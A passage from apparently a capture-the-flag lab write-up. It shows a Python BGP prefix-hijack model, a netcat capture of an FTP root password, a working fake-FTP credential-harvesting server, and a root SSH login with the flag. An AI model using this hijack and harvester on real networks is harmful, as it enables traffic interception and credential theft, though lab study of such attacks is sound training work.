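    if not candidates:
        return None
    return max(candidates, key=lambda c: (c[0].prefixlen, -len(c[2])))


def hijack_prefix(target, victim_prefix):
    """Smallest step more specific than the victim's prefix that still covers
    the target host: 10.120.15.10 in 10.120.15.0/24 -> 10.120.15.0/25."""
    net = ipaddress.ip_network(victim_prefix)
    for sub in net.subnets(prefixlen_diff=1):
        if ipaddress.ip_address(target) in sub:
            return str(sub)
    raise ValueError(f"{target} is not inside {victim_prefix}")


def announce(rib, prefix):
    """Model `router bgp 100` / `network <prefix>`: originate it locally."""
    return rib + [(prefix, "0.0.0.0", [])]


if __name__ == "__main__":
    target = "10.120.15.10"
    before = best_route(RIB, target)
    prefix = hijack_prefix(target, str(before[0]))
    after = best_route(announce(RIB, prefix), target)
    print(f"before: {target} -> {before[1]} via AS path {before[2]}")
    print(f"announce {prefix}; after: {target} -> {after[1]} (local)")
```

Announcing the /25 only attracts the packets; the ifconfig step above is what makes r1 actually answer on 10.120.15.10 once they arrive. Note that the half of the /24 not covered by the /25 keeps flowing to the real network, which is why a single /25 is enough here and less noisy than hijacking the whole /24.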
Capture the traffic with netcat.
After waiting a couple of minutes, a connection arrives from the remote host.
By replying with "331 Please specify the password.", we obtain the password of user root:
root@r1:~# nc -nlvp 21
nc -nlvp 21
Listening on [0.0.0.0] (family 0, port 21)
Connection from [10.78.10.2] port 21 [tcp/*] accepted (family 2, sport 52504)
USER root
331 Please specify the password.
PASS BGPtelc0rout1ng
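The manual netcat dialogue above, as an added Python example that is not from the original write-up: a fake FTP server that sends the 220 greeting, answers USER with 331 and records the PASS that follows. The banner text, the port and the sample client bytes are assumptions; it is meant to run on r1 once r1 holds 10.120.15.10.

```python
import io
import socket

# Added example (not from the original write-up): a minimal fake FTP server
# that does what the netcat session did by hand. It sends the 220 greeting,
# answers USER with 331 so the client sends PASS, records both, then refuses
# the login. ftp_capture() works on file-like objects so it can be exercised
# offline; serve() wraps it around a real socket on the hijacked address.

def ftp_capture(rfile, wfile, banner="220 (vsFTPd 3.0.3)"):
    """Drive one FTP control connection far enough to collect USER and PASS.

    Returns (user, password); either may be None if the client gave up early.
    """
    def reply(code_text):
        wfile.write(code_text.encode("ascii") + b"\r\n")
        wfile.flush()

    reply(banner)
    user = password = None
    while True:
        line = rfile.readline()
        if not line:
            break
        cmd, _, arg = line.decode("latin-1").rstrip("\r\n").partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
            reply("331 Please specify the password.")
        elif cmd == "PASS":
            password = arg
            reply("530 Login incorrect.")  # we have what we came for
            break
        elif cmd == "QUIT":
            reply("221 Goodbye.")
            break
        else:
            reply("530 Please login with USER and PASS.")
    return user, password


def capture_from_bytes(client_input):
    """Offline harness: run ftp_capture over constructed client bytes.
    Returns (user, password, everything the fake server wrote)."""
    rfile, wfile = io.BytesIO(client_input), io.BytesIO()
    user, password = ftp_capture(rfile, wfile)
    return user, password, wfile.getvalue()


def serve(bind="0.0.0.0", port=21, once=True):
    """Listen on the hijacked address (r1 holds 10.120.15.10 on eth2 at this
    point) and print credentials as clients connect."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(5)
        while True:
            conn, peer = srv.accept()
            with conn, conn.makefile("rb") as rfile, conn.makefile("wb") as wfile:
                user, password = ftp_capture(rfile, wfile)
            print(f"[{peer[0]}] USER={user!r} PASS={password!r}")
            if once:
                break


if __name__ == "__main__":
    # Constructed client input, the same exchange the netcat session showed.
    print(capture_from_bytes(b"USER root\r\nPASS BGPtelc0rout1ng\r\n"))
    serve()
```

Unlike the raw netcat session, this sends the 220 greeting itself, so a scripted client that waits for the banner before sending USER does not hang; the 530 after PASS simply ends the dialogue, since the goal is the credential, not a working FTP service.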
We cannot use this password for FTP.
However, we can use it to log in to "10.10.10.105" over SSH as root.
root@kali:~# ssh root@10.10.10.105
The authenticity of host '10.10.10.105 (10.10.10.105)' can't be established.
ECDSA key fingerprint is SHA256:ocbg7qpaEpjQc5WGCnavYd2bgyXg7S8if8UaXgT1ztE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.105' (ECDSA) to the list of known hosts.
root@10.10.10.105's password:
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Mar 19 17:48:44 UTC 2019
System load: 0.08 Users logged in: 0
Usage of /: 40.8% of 19.56GB IP address for ens33: 10.10.10.105
Memory usage: 32% IP address for lxdbr0: 10.99.64.1
Swap usage: 0% IP address for lxdbr1: 10.120.15.10
Processes: 211
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
4 packages can be updated.
0 updates are security updates.
Last login: Wed Sep 5 14:32:15 2018
root@carrier:~# ls
root.txt secretdata.txt
root@carrier:~# cat root.txt
2832e552061532250ac2a21478fd4866